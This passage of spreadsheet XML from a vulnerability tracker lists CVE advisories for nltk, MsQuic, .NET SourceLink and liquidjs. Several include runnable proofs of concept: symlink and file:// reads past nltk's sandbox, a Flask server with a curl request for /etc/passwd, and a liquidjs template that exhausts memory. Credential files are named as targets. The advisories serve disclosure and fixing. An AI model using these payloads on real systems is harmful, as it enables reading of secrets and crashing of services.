- No malicious file for a victim to open, no special user interaction. Just a tampered or shared corpus directory (`SECURITY.md` names "shared environments... multi-tenant pipelines" as the project's own stated threat model) plus a completely normal API call.
- Core corpus-reader code, reached through plain `import nltk` and documented, programmatic usage (`words()`, `sents()`, `channels()`, etc.), not a demo or GUI tool.
- Same reader category, and same CWE-59 mechanism, already treated as CVE-worthy twice in this codebase for `FramenetCorpusReader` and `NKJPCorpusReader`.
- Not a bypass of a claimed fix. `ipipan.py` has never had security hardening applied, and has no dedicated test coverage at all.

## CVSS v3.1

- **AV:L, AC:L**: exploitation is local filesystem symlink placement, then immediate and deterministic once triggered.
- **PR:L**: the attacker needs some pre-existing ability to plant a symlink somewhere reachable, not zero privilege, but not elevated either.
- **UI:N**: fires during routine, automated corpus processing, no separate victim action.
- **S:U**: stays within the same process's existing privileges.
- **C:H, I:N, A:N**: arbitrary file read only, no write, no crash.

## Suggested fix

Route `_get_tag()` through `nltk.pathsec.validate_path()` with the corpus root as `required_root`, or through `CorpusReader.open()`, instead of converting the `PathPointer` to a plain string and calling builtin `open()` directly. The same fix pattern already applied to `FramenetCorpusReader` and `NKJPCorpusReader` applies directly here.</t></is></c><c r="T1572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="1573"><c r="A1573" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1573" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D1573" s="5" t="inlineStr" /><c r="E1573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1573" s="5" t="inlineStr" /><c r="H1573" s="5" t="n"><v>0.006</v></c><c r="I1573" s="5" t="inlineStr" /><c r="J1573" s="5" t="inlineStr" /><c r="K1573" s="5" t="inlineStr" /><c r="L1573" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1573" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1573" s="5" t="inlineStr" /><c r="R1573" s="5" t="inlineStr" /><c r="S1573" s="5" t="inlineStr"><is><t>This is a **new, distinct vulnerability**: a bypass of the fix already published as [GHSA-xh95-f55m-82fw](https://github.com/nltk/nltk/security/advisories/GHSA-xh95-f55m-82fw) ("Path traversal in NLTK FramenetCorpusReader.frame() allows arbitrary XML file read, bypassing the nltk.pathsec sandbox"), not a duplicate of it.

## Summary

The original advisory was fixed (PR [#3581](https://github.com/nltk/nltk/pull/3581)) by adding `_reject_unsafe_path_component()`, which blocks literal `/`, `\`, `..`, and Windows drive prefixes in caller-/corpus-supplied names. It never resolves symlinks. All three call sites that use this guard still resolve the resulting path through `self.abspath()` (`nltk/corpus/reader/api.py`, `self._root.join(fileid)`), which is a plain lexical join, not the symlink-resolving, `required_root`-scoped check that `CorpusReader.open()` (and `NKJPCorpusReader`'s own fix for its sibling advisory) correctly use elsewhere in this same codebase.

A symlink placed inside the corpus's own subdirectory, with a name containing no separators at all, passes the guard cleanly and reads a file completely outside the corpus root.

## Affected code (`nltk/corpus/reader/framenet.py`)

- `frame_by_name()` reads `&lt;frame_dir&gt;/&lt;name&gt;.xml`
- `_lu_file()` reads `&lt;lu_dir&gt;/lu&lt;id&gt;.xml`
- `doc()` reads `&lt;fulltext_dir&gt;/&lt;filename&gt;`

All three follow the same chain: `_reject_unsafe_path_component(value, ...)`, then `self.abspath(os.path.join(subdir, value))`, then `XMLCorpusView(...)`, opened via `PathPointer.open()` with no `required_root`.

## Proof of concept

Self-contained, runnable end to end.

```python
import os
import tempfile

from nltk.corpus.reader.framenet import FramenetCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "framenet_v17")
frame_dir = os.path.join(corpus_root, "frame")
secret_dir = os.path.join(root, "outside_framenet_root")
os.makedirs(frame_dir)
os.makedirs(secret_dir)

with open(os.path.join(corpus_root, "frRelation.xml"), "w") as f:
    f.write("&lt;frameRelations/&gt;")

secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write(
        '&lt;frame cBy="000" cDate="01/01/2000" name="StolenFrame" ID="999999"&gt;'
        "&lt;definition&gt;THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT&lt;/definition&gt;"
        "&lt;/frame&gt;"
    )

# Attacker plants this inside &lt;corpus_root&gt;/frame/. No path separators,
# so it passes _reject_unsafe_path_component cleanly.
link_path = os.path.join(frame_dir, "evil_link.xml")
os.symlink(secret_path, link_path)

reader = FramenetCorpusReader(corpus_root, [])
reader._frame_idx = {"__dummy__": {"name": "__dummy__"}}  # skip unrelated index build

result = reader.frame_by_name("evil_link")   # normal, routine call, no ".." anywhere
print("frame name:", result["name"])
print("definition:", result["definition"])
```

Actual output when run against unpatched `main` (commit `35813c8`):

```
frame name: StolenFrame
definition: THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT
```

That content was read from `secret_path`, a file entirely outside `corpus_root`, via a single, unmodified, public API call. No exception is raised anywhere in the chain; `_reject_unsafe_path_component` passes because `"evil_link"` contains no separators, `..`, or drive prefix.

Verified the same way for the other two affected call sites, `_lu_file()` (`lu&lt;id&gt;.xml` symlink under `lu/`) and `doc()` (arbitrary filename symlink under `fulltext/`), both succeeding identically with no exception raised.
## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered/shared corpus directory (NLTK's own `SECURITY.md` names "shared environments... multi-tenant pipelines" as its threat model) plus a completely normal API call.
- Core corpus-reader code, not a demo/GUI tool.
- Confirmed unintentional: PR #3581's own description states the goal was to route through "the `nltk.pathsec` sandbox... including the strict `ENFORCE=True` mode" and be "consistent with the validation already used elsewhere in NLTK." It doesn't achieve that, since `abspath()` never reaches the scoped, symlink-resolving check that exists and is used correctly elsewhere in the same file tree (`NKJPCorpusReader`).

## Suggested fix

Route all three call sites through `CorpusReader.open()` (or pass `required_root=self._root` to `validate_path()` directly, as `NKJPCorpusReader` already does), instead of `self.abspath()` plus raw `PathPointer.open()`.</t></is></c><c r="T1573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="1574"><c r="A1574" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1574" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D1574" s="5" t="inlineStr" /><c r="E1574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1574" s="5" t="inlineStr" /><c r="H1574" s="5" t="n"><v>0.004</v></c><c r="I1574" s="5" t="inlineStr" /><c r="J1574" s="5" t="inlineStr" /><c r="K1574" s="5" t="inlineStr" /><c r="L1574" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1574" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1574" s="5" t="inlineStr" /><c r="R1574" s="5" t="inlineStr" /><c r="S1574" s="5" t="inlineStr"><is><t>### Summary

Published `nltk==3.9.4` still contains several XML-reader entrypoints that build parser paths from caller-controlled selectors or trusted-looking index state without preserving the corpus-root boundary.

### Details

- **Vulnerability type:** Path traversal and trusted-root bypass
- **Affected component:** `FramenetCorpusReader.frame_by_name`, `FramenetCorpusReader.doc`, `FramenetCorpusReader.lu`, `NKJPCorpusReader.header`
- **Affected versions:** Published `3.9.4` reproduced. Current source `v3.10.0-rc2` acted as a negative control and blocked the same payloads.
- **Patched versions:** Patched in version 3.10.0, which includes the path-safety rejections seen in the release candidate.
- **Root cause:** Stable reader paths still construct raw XML filenames from unsafe selectors, poisoned index state, or unsafe file identifiers.

I confirmed four public stable entrypoints return parsed outside-root content: a parent-segment traversal frame name, a poisoned fulltext index filename, a poisoned LU id, and an unsafe NKJP header file identifier. Current source rejects the same payloads with explicit path-safety errors, which shows the bug is real but version-scoped to the published stable package.

### PoC

**Preconditions**
- The application exposes FrameNet or NKJP reader APIs while trusting NLTK to keep XML parsing inside a corpus root.

**Steps**
1. Create a minimal FrameNet or NKJP corpus root and place attacker-chosen XML files outside that root.
2. Feed unsafe selectors or poisoned index state into the relevant public stable `3.9.4` APIs.
3. Observe `frame_by_name`, `doc`, `lu(...).exemplars`, or `header` return parsed outside-root values.
4. Run the same payloads against current source and observe explicit path-safety rejections.

**Minimal reproducible excerpt**

```text
framenet_frame_definition FRAME_LEAK
framenet_doc_text DOC_LEAK
framenet_lu_text LU_LEAK
nkjp_header_title HEADER_LEAK
```

### Impact

Applications that process attacker-influenced FrameNet or NKJP corpus selectors or state can be made to parse XML outside the trusted corpus root through normal public reader responses.

### Remediation

Keep these reader paths on the same root-confinement model as `CorpusReader.open()` and `nltk.pathsec`. Reject unsafe path components before constructing filenames from frame names, document filenames, LU ids, or NKJP file identifiers.

### Resources

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1366-L1369
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1456-L1460
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1803-L1810
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L96-L103
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L251-L256
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/framenet.py#L1388-L1399
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/nkjp.py#L96-L128</t></is></c><c r="T1574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="1575"><c r="A1575" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1575" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D1575" s="5" t="inlineStr" /><c r="E1575" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1575" s="5" t="inlineStr" /><c r="H1575" s="5" t="n"><v>0.012</v></c><c r="I1575" s="5" t="inlineStr" /><c r="J1575" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K1575" s="5" t="inlineStr" /><c r="L1575" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M1575" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1575" s="5" t="inlineStr" /><c r="R1575" s="5" t="inlineStr" /><c r="S1575" s="5" t="inlineStr"><is><t># Summary
Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.

# Details

New network path creations and removals triggered by incoming packets can lead to a pointer invalidation.

## Patches

- Guard path promotion [e0f55b5](https://github.com/microsoft/msquic/commit/e0f55b5fdc9fff0b4465976d066ebd22fb7e2b3b)

# Impact

An unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to an affected service over the network. Successful exploitation could allow the attacker to execute code on the target system. No authentication or user interaction is required.</t></is></c><c r="T1575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="1576"><c r="A1576" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1576" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D1576" s="5" t="inlineStr" /><c r="E1576" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1576" s="5" t="inlineStr" /><c r="H1576" s="5" t="n"><v>0.005</v></c><c r="I1576" s="5" t="inlineStr" /><c r="J1576" s="5" t="inlineStr" /><c r="K1576" s="5" t="inlineStr" /><c r="L1576" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Build.Tasks.Git, NuGet:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M1576" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1576" s="5" t="inlineStr" /><c r="R1576" s="5" t="inlineStr" /><c r="S1576" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Microsoft.Build.Tasks.Git and Microsoft.SourceLink.AzureRepos.Git. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

Improper removal of sensitive information before storage or transfer in .NET allows an unauthorized attacker to disclose information over a network.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C`
- **Weakness:** CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer

## Affected Platforms

- **Platforms:** Windows, Linux, macOS
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name="published-nuget-packages"&gt;&lt;/a&gt;Published NuGet packages
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303

The affected packages used by .NET 8 and .NET 9 SDKs are built with SDK-specific prerelease versions that aren't published as stable NuGet packages. Update to SDK 8.0.130 or 8.0.424, SDK 9.0.120 or 9.0.317, or SDK 10.0.111 or 10.0.303 to receive the fix.

## Advisory FAQ

### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?

If using a package listed in [affected packages](#affected-packages), you're exposed to the vulnerability.

### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?

1. To fix the issue please install the latest version of .NET. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
2. If your application references the vulnerable package, update the package reference to the patched version. You can list the versions you have installed by running the `dotnet --info` command.

Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.

Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.

## Other Information

### Reporting Security Issues

If you have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You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You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[CVE-2026-62900](https://www.cve.org/CVERecord?id=CVE-2026-62900)

### Acknowledgements

Ivan Demchuk

### Revisions

V1.0 (08/11/2026): Advisory published.</t></is></c><c r="T1576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="1577"><c r="A1577" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1577" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D1577" s="5" t="inlineStr" /><c r="E1577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1577" s="5" t="inlineStr" /><c r="H1577" s="5" t="n"><v>0.006</v></c><c r="I1577" s="5" t="inlineStr" /><c r="J1577" s="5" t="inlineStr" /><c r="K1577" s="5" t="inlineStr" /><c r="L1577" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1577" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1577" s="5" t="inlineStr" /><c r="R1577" s="5" t="inlineStr" /><c r="S1577" s="5" t="inlineStr"><is><t>## Summary
Setting `nltk.pathsec.ENFORCE = True` is documented to sandbox all file access to allowed NLTK data directories and raise `PermissionError` on unauthorized access. However, `StreamBackedCorpusView` opens files via `builtins.open()` directly, bypassing `pathsec.validate_path()` entirely. An attacker who can influence the `fileid` argument can read arbitrary local files regardless of the `ENFORCE` setting.

## Details
`nltk/pathsec.py:274` defines the enforcement point:
```python
def open(file, mode="r", **kwargs):
    validate_path(file, context="pathsec.open")
    return builtins.open(file, mode=mode, **kwargs)
```

`StreamBackedCorpusView._open()` in `nltk/corpus/reader/util.py` bypasses this entirely for string paths:

```python
# line 171 — no validate_path() call
self._eofpos = os.stat(self._fileid).st_size

# line 208 — calls builtins.open directly
self._stream = open(self._fileid, "rb")
```

Also affected: `XMLCorpusView` and any corpus reader subclass that passes a raw string `fileid` to `StreamBackedCorpusView`.

## PoC
```python
# poc_server.py — StreamBackedCorpusView pathsec.ENFORCE bypass
from flask import Flask, request, jsonify
import nltk.pathsec as ps
from nltk.corpus.reader.util import StreamBackedCorpusView, read_line_block

# Strict mode enabled — expected to sandbox all file access
ps.ENFORCE = True

app = Flask(__name__)

@app.post("/read")
def read_file():
    fname = request.json.get("file")
    # fileid is user-controlled, passed directly to StreamBackedCorpusView
    # pathsec.ENFORCE = True is ignored — builtins.open() called internally
    view = StreamBackedCorpusView(fname, read_line_block, encoding="utf8")
    return jsonify({"file": fname, "content": view[0]})

app.run(host="0.0.0.0", port=8000)
```
Trigger:
```
curl -s -X POST http://localhost:8000/read \
  -H "Content-Type: application/json" \
  -d '{"file": "/etc/passwd"}'
```
Confirmed on latest stable NLTK. No privileges required.

## Impact
- **Type:** Arbitrary Local File Read / Security Control Bypass
- **CWE:** CWE-22, CWE-284
- **OWASP:** A01:2021 – Broken Access Control

Affects web apps, REST APIs, and multi-tenant NLP pipelines where user input influences the `fileid` passed to NLTK corpus readers. Sensitive targets include `/etc/passwd`, `/proc/self/environ` (may contain `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, etc.), and application config files.

The core issue is that operators who explicitly set `ENFORCE = True` to harden production deployments are left with a **false security guarantee**.

**Suggested fix:** Replace `builtins.open()` and `os.stat()` in the string-path branch with `nltk.pathsec.open()` and `nltk.pathsec.validate_path()`.</t></is></c><c r="T1577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="1578"><c r="A1578" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1578" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D1578" s="5" t="inlineStr" /><c r="E1578" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1578" s="5" t="inlineStr" /><c r="H1578" s="5" t="n"><v>0.004</v></c><c r="I1578" s="5" t="inlineStr" /><c r="J1578" s="5" t="inlineStr" /><c r="K1578" s="5" t="inlineStr" /><c r="L1578" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1578" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1578" s="5" t="inlineStr" /><c r="R1578" s="5" t="inlineStr" /><c r="S1578" s="5" t="inlineStr"><is><t>### Summary

There's a logic bug in `FileSystemPathPointer.open()` inside `nltk/data.py`
that makes the sandbox check permanently inert. The guard condition is always
`False` — meaning any file the process can read is accessible by passing a
`file://` URL to `nltk.data.load()`.

---

### Details

In `nltk/data.py`, `FileSystemPathPointer.open()` was patched at some point
with a comment saying "SECURITY PATCH ENFORCING SANDBOX", but the check
doesn't work:
```python
def open(self, encoding=None):
    path = os.path.normpath(self._path)

    # Block raw absolute reads such as "/" "C:\\Windows" etc.
    if os.path.isabs(path) and path != os.path.normpath(self._path):
        raise ValueError(f"Direct absolute file access blocked: {path}")

    stream = open(self._path, "rb")
```

`path` is set to `os.path.normpath(self._path)` on line 1, then compared
against `os.path.normpath(self._path)` again in the condition. They are
always equal. The `ValueError` never fires.

On top of that, `__init__` already calls `os.path.abspath()` before storing
`self._path`, so it's normalized before `open()` is even called. Running
`normpath` on it again changes nothing.

The `stream = open(self._path, "rb")` line is always reached regardless of
what path was passed in.

---

### PoC

Tested on Python 3.11, NLTK 3.9.1, Ubuntu 22.04.
```python
import nltk
from nltk.data import FileSystemPathPointer

# direct construction
ptr = FileSystemPathPointer("/etc/passwd")
with ptr.open() as f:
    print(f.read(300))

# via load() using file:// URL
data = nltk.data.load("file:///etc/passwd", format="raw")
print(data[:300])
```

Both print file contents. No exception is raised.

---

### Impact

Any app that lets users influence the string passed to `nltk.data.load()` or
`nltk.data.find()` is exposed — web APIs, notebook servers, multi-tenant
pipelines. An attacker can read any file the process user has access to:
`/etc/passwd`, `.env` files, private keys, `~/.aws/credentials`, etc.

## Suggested Fix

**File:** `nltk/data.py` — `FileSystemPathPointer.open()` (lines 378–390)

### What's wrong

Line 387 compares `normpath(self._path)` against itself — always equal,
so the `ValueError` never fires. The check is dead code.
`__init__` already calls `abspath()` on construction, so re-running
`normpath` inside `open()` changes nothing either.

---

### Fix

Validate against the actual list of permitted data directories instead:
```python
def open(self, encoding=None):
    import nltk.data as _d
    allowed = [os.path.abspath(p) for p in _d.path if p]
    if allowed and not any(
        os.path.commonpath([self._path, r]) == r for r in allowed
    ):
        raise ValueError(
            f"Access outside nltk_data blocked: {self._path!r}"
        )
    stream = open(self._path, "rb")
    if encoding is not None:
        stream = SeekableUnicodeStreamReader(stream, encoding)
    return stream
```

---

### Why `commonpath` not `startswith`

`startswith` is bypassable by a path that shares a prefix:
```
/tmp/nltk_data_evil".startswith("/tmp/nltk_data") → True  ✗
commonpath(["/tmp/nltk_data_evil", "/tmp/nltk_data"]) → "/tmp"  ✓
```

---

### Diff
```diff
-    path = os.path.normpath(self._path)
-    if os.path.isabs(path) and path != os.path.normpath(self._path):
-        raise ValueError(f"Direct absolute file access blocked: {path}")
-
+    import nltk.data as _d
+    allowed = [os.path.abspath(p) for p in _d.path if p]
+    if allowed and not any(
+        os.path.commonpath([self._path, r]) == r for r in allowed
+    ):
+        raise ValueError(f"Access outside nltk_data blocked: {self._path!r}")
     stream = open(self._path, "rb")
```</t></is></c><c r="T1578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="1579"><c r="A1579" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1579" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D1579" s="5" t="inlineStr" /><c r="E1579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1579" s="5" t="inlineStr" /><c r="H1579" s="5" t="n"><v>0.004</v></c><c r="I1579" s="5" t="inlineStr" /><c r="J1579" s="5" t="inlineStr" /><c r="K1579" s="5" t="inlineStr" /><c r="L1579" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M1579" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1579" s="5" t="inlineStr" /><c r="R1579" s="5" t="inlineStr" /><c r="S1579" s="5" t="inlineStr"><is><t>### Summary

The `join` filter (`src/filters/array.ts:8-13`) charges `memoryLimit` by array element **count**, not by the string length it produces, letting a template bypass a configured `memoryLimit` and allocate strings far past budget — bounded only by V8/process limits, not by `memoryLimit`.

### Details

```js
// src/filters/array.ts:8-13
export const join = argumentsToValue(function (this: FilterImpl, v: any[], arg: string) {
  const array = toArray(v)
  const sep = isNil(arg) ? ' ' : stringify(arg)
  const complexity = array.length * (1 + sep.length)   // element COUNT, not element sizes
  this.context.memoryLimit.use(complexity)
  return array.join(sep)                                // allocates sum(element lengths) + separators
})
```

`concat` (`array.ts:72`) is the enabler: it charges by element count too, but only copies references (cheap for both limiter and heap), so an array's element count can be doubled repeatedly at near-zero real cost. `join` is where the bug lives — it's the call that actually materializes all referenced content into one string, and its own charge (`array.length`) doesn't reflect that.

Same undercounting class as already-fixed `replace` (GHSA-mmg9-6m6j-jqqx), `replace_first` (GHSA-6q5m-63h6-5x4v), `date`/strftime (GHSA-hh27-hf48-9f5q) — `join` wasn't covered. Sibling `array_to_sentence_string` (`src/filters/string.ts:210`) has the identical defect.

### PoC

Live-reproduced against `liquidjs@10.27.1`, Node v24.3.0.

```javascript
const { Liquid } = require('liquidjs');
const engine = new Liquid({ memoryLimit: 1e7 }); // 10M-unit DoS defense

const E = 5000, DOUBLINGS = 13;
const chunk = 'a'.repeat(E);
let tpl = `{%- assign s = "${chunk}" -%}{%- assign a = s | split: "NOSUCHSEP" -%}`;
for (let i = 0; i &lt; DOUBLINGS; i++) tpl += `{%- assign a = a | concat: a -%}`; // 1 -&gt; 8192 elements
tpl += `{%- assign out = a | join: "" -%}{{ out | size }}`;

const len = Number(engine.renderSync(engine.parse(tpl))); // succeeds — should be blocked
console.log('output length:', len);  // output length: 40960000
```

Verified by binary-search on `memoryLimit`: render is **blocked at 29573**, **succeeds at 29574** — confirming total charge across `split`+13×`concat`+`join` is exactly 29,574 units (split 5000, concat 16382, join 8192). Output length: **40,960,000** — **1385x** the total charged, &gt;4x the configured 10,000,000-unit limit. Scaling `DOUBLINGS` grows output exponentially for linear charge growth, driving toward gigabytes and a `RangeError: Invalid string length` / V8 OOM crash.

### Impact

Any app rendering attacker-influenced templates with `memoryLimit` set (LiquidJS docs list it as covering "array concat/join/strftime") can have that control bypassed by one short template, forcing allocation well past budget up to a process crash. `split`/`concat` are correctly charged; the gap is `join`'s own accounting of its own output. (LiquidJS's security-model docs call these limits "cooperative safeguards, not strict isolation" — doesn't change that `join`'s charge is wrong relative to what it allocates.)</t></is></c><c r="T1579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="1580"><c r="A1580" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1580" s="5" t="inlineStr"><is><t>CVE-2026-70613</t></is></c><c r="D1580" s="5" t="inlineStr" /><c r="E1580" s="5" t="inlineStr" /><c r="F1580" s="5" t="inlineStr" /><c r="G1580" s="5" t="inlineStr" /><c r="H1580" s="5" t="inlineStr" /><c r="I1580" s="5" t="inlineStr" /><c r="J1580" s="5" t="inlineStr" /><c r="K1580" s="5" t="inlineStr" /><c r="L1580" s="5" t="inlineStr" /><c r="M1580" s="5" t="inlineStr" /><c r="N1580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1580" s="5" t="inlineStr" /><c r="R1580" s="5" 